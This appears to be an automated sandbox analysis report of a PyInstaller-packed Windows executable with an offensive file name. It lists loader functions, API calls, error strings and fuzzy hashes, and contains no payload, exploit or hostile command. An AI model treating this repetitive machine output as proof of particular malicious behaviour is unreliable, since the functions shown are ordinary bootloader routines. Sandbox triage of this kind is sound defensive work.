                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                            • Opcode ID: 3201fc6698c0733d934283fdf0b7fc99b444569cb26fde5c5b53d3a473a789a2
                                                                                                                                                                                                                                            • Instruction ID: 51369ca1f2913a88d74bca2540edec8a31f8be4fd1f1aeef11c464701a6b4028
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3201fc6698c0733d934283fdf0b7fc99b444569cb26fde5c5b53d3a473a789a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E841A861B0865282EA10DB91A8076B973A0FF44BC4F844632ED9CE7796DF3CF546A740
                                                                                                                                                                                                                                            Function 00007FF633D61470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                            • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                            • Opcode ID: b7d9ed86abc52d5975ef8ae8469ac47edc22ad97562613f38df161424eb54398
                                                                                                                                                                                                                                            • Instruction ID: d4d2e6fea381ba84e704f53d4ba53531d05f7e933aa213446e06bfb832ffe5c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d9ed86abc52d5975ef8ae8469ac47edc22ad97562613f38df161424eb54398
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E241A031A0864286EB10DFA1D4125B9B3A0FF44794F844A32EDADA7B95DE3CE546A704
                                                                                                                                                                                                                                            Function 00007FF633D6EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                            • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction ID: fb1b30cd20393363f9eab9516b10b03b0fc1f1707cefceac0430de3548b9ee72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD1D432A08B4186EB20DFA5D5423AD37A0FB54788F900335EE5DA77AADF38E095D740
                                                                                                                                                                                                                                            Function 00007FF633D62C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
                                                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF633D62D99
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                            • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                            • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction ID: e887b4e9ee61f3d6761854eb8504e09a25780305fe5106c886124e6aca3dbb07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79310832708B4142E7209BA5B8152BA7791BF88B88F810236EF5DE7759EF3CE516D700
                                                                                                                                                                                                                                            Function 00007FF633D6DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD4D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD5B
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD85
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDF3
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDFF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                            • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction ID: 1018d420bc4576bb4e78e3352b4c7e5d447be61324c602785fa081507e9a0f08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C121B1EB02D1EE11AB82A4026B53394FF48BA4F994735DD3DAB389EF3CE4449710
                                                                                                                                                                                                                                            Function 00007FF633D66360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                            • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                            • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                            • Instruction ID: 1349cc8312471161d2379808559c6e6d0b30e26a3d080edb85694fb6660dab5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E417131A1DA8691EA21DBA4E4162E97361FF44344FC00332EA6DA7795EF3CF519D740
                                                                                                                                                                                                                                            Function 00007FF633D62A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF633D6351A,?,00000000,00007FF633D63F1B), ref: 00007FF633D62AA0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                            • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction ID: 5e051762cfbcc9d9c02d9a40582793537229a18107c4dca1f2d83445d9370648
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F21A33261978182E7209B91F8427E67394FB88784F800236FE9CA3759DF7CD1459740
                                                                                                                                                                                                                                            Function 00007FF633D7B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                            • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                            • Instruction ID: 86d6940a3b2219007d66e191e412a291f70027244548114bd368ba9229ea2f96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B215B20F0D24281FA686FE19A5323952525F447B0F144734ED3EFBBD6DE2CB455A300
                                                                                                                                                                                                                                            Function 00007FF633D87D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                            • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                            • Instruction ID: af53bc2dcb930963b7421398c021bcd4b1365de1eeb1f8282b70542f2ad61348
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6711B621B18B4286E7508B92F85632963A0FB88FE4F040334EA6DDB7A4DF3CE9148740
                                                                                                                                                                                                                                            Function 00007FF633D68ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68EFD
                                                                                                                                                                                                                                            • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68F5A
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D68FE5
                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69044
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D69055
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF633D63FA9), ref: 00007FF633D6906A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3462794448-0
                                                                                                                                                                                                                                            • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                            • Instruction ID: 2cd8b1c69494db67d0b1a953af33810459aa8d9b5b5905be50cc7c462e16ab18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2141B961B19A8281EB309B91A5422BAB394FF85BC4F841235DF6EE7789DF3CE511D700
                                                                                                                                                                                                                                            Function 00007FF633D7B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B2D7
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B30D
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B33A
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B34B
                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B35C
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A,?,?,?,?,00007FF633D7718F), ref: 00007FF633D7B377
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                            • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                            • Instruction ID: 187532b38a27bdcbbcd2acae768bcb6fc113820c00d8ea0740a003fdd47af6c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC114F20F0C64282FA686FA1965323D62569F45BB0F544734E93EFB7E6DE6CF4916300
                                                                                                                                                                                                                                            Function 00007FF633D62910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF633D61B6A), ref: 00007FF633D6295E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                                                                                                                            • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                            • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                            • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction ID: afd009434f3403cab6d77ae120dfd1b90e560974ea6bd378f7d987ca72e5539d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29310872B1968152E7209BA5A8426E77395BF887D8F800232FE9DE3755EF3CD146D700
                                                                                                                                                                                                                                            Function 00007FF633D62390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
